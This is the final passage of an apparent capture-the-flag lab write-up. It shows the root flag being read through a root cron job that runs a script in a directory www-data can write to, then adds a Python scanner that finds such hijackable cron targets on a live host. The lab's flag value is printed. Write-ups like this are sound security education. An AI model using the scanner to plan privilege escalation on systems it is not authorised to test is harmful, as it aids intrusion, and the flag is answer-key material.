-r--------  1 root root   33 Jun 23  2017 root.txt
root@europa:~# cat root.txt
7f19438b27578e4fcc8bef3a029af5a5

And done.
 
An easier and quicker way to get the flag would have been to change root's password and ssh in as root, or simply have the cron job copy /root/root.txt into a readable file.
But hey…..there are always other ways to get things done.
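The privilege escalation used here is a pattern worth checking for automatically: a root cron job whose command, or a script that command runs, refers to a file the current user can overwrite or create. The following is an added example, not code from this writeup. It parses a system crontab, follows readable scripts a couple of levels deep, and reports targets that are writable or missing from a writable directory. The crontab lines and the clearlogs script are copied from the listings above; FakeFS is a constructed stand-in for the box's permissions so the demo runs offline, and RealFS runs the same check against a live host.

```python
import os
import re

# Added example, not code from the writeup. It automates the chain found above:
# a root cron job -> clearlogs -> exec of a script in a directory www-data can
# write to. FakeFS mirrors the listings in the writeup; RealFS is for a live host.

PATH_RE = re.compile(r'(?<![\w.-])/[\w./-]+')   # absolute paths in a command or script


def parse_system_crontab(text):
    """Yield (user, command) from /etc/crontab or /etc/cron.d/* style files,
    which carry a user field; @reboot-style lines are handled too."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#') or '=' in line.split()[0]:
            continue                                    # comments, SHELL=, PATH=
        special = line.startswith('@')
        parts = line.split(None, 2) if special else line.split(None, 6)
        if len(parts) == (3 if special else 7):
            yield parts[-2], parts[-1]


def writable_cron_targets(crontab_text, fs, max_depth=2):
    """Return [(user, path, reason)] for paths reachable from each cron command
    (following readable scripts up to max_depth) that we could hijack."""
    findings = []
    for user, command in parse_system_crontab(crontab_text):
        seen, frontier = set(), [(p, 0) for p in PATH_RE.findall(command)]
        while frontier:
            path, depth = frontier.pop()
            if path in seen:
                continue
            seen.add(path)
            if not fs.exists(path):
                parent = os.path.dirname(path)
                if fs.exists(parent) and fs.writable(parent):
                    findings.append((user, path, 'missing target in writable dir'))
                continue
            if fs.writable(path):
                findings.append((user, path, 'existing target is writable'))
            content = fs.read(path) if depth < max_depth else None
            if content:
                frontier.extend((p, depth + 1) for p in PATH_RE.findall(content))
    return findings


class RealFS:
    """Live host. os.access() answers for the current user, so run this as the
    user you actually have (www-data here); as root everything is writable."""
    def exists(self, p): return os.path.exists(p)
    def writable(self, p): return os.access(p, os.W_OK)
    def read(self, p):
        if not os.path.isfile(p) or not os.access(p, os.R_OK):
            return None
        with open(p, errors='replace') as f:
            return f.read(65536)


class FakeFS:
    """Constructed stand-in: path -> content (None for directories/binaries)."""
    def __init__(self, files, writable):
        self.files, self._writable = files, set(writable)
    def exists(self, p): return p in self.files
    def writable(self, p): return p in self._writable
    def read(self, p): return self.files.get(p)


# Constructed from the listings above: cron runs clearlogs as root every minute,
# clearlogs exec()s /var/www/cmd/logcleared.sh, /var/www/cmd is writable by
# www-data, and logcleared.sh does not exist yet.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *\t* * *\troot    cd / && run-parts --report /etc/cron.hourly
* * * * *\troot\t/var/www/cronjobs/clearlogs
"""
CLEARLOGS = """#!/usr/bin/php
<?php
$file = '/var/www/admin/logs/access.log';
file_put_contents($file, '');
exec('/var/www/cmd/logcleared.sh');
?>
"""
DEMO_FS = FakeFS(
    files={'/etc/cron.hourly': None, '/usr/bin/php': None, '/var/www/cmd': None,
           '/var/www/admin/logs': None, '/var/www/admin/logs/access.log': '',
           '/var/www/cronjobs/clearlogs': CLEARLOGS},
    writable={'/var/www/cmd'},
)

if __name__ == '__main__':
    for hit in writable_cron_targets(SAMPLE_CRONTAB, DEMO_FS):
        print('demo:', hit)
    if os.path.exists('/etc/crontab'):              # same check on the live host
        with open('/etc/crontab') as f:
            for hit in writable_cron_targets(f.read(), RealFS()):
                print('host:', hit)
```

On the box the interesting hit is the second kind: clearlogs itself is root-owned and read-only, so a check that only looks at the cron command's own file misses it; the weakness is the missing logcleared.sh inside a directory www-data can write to.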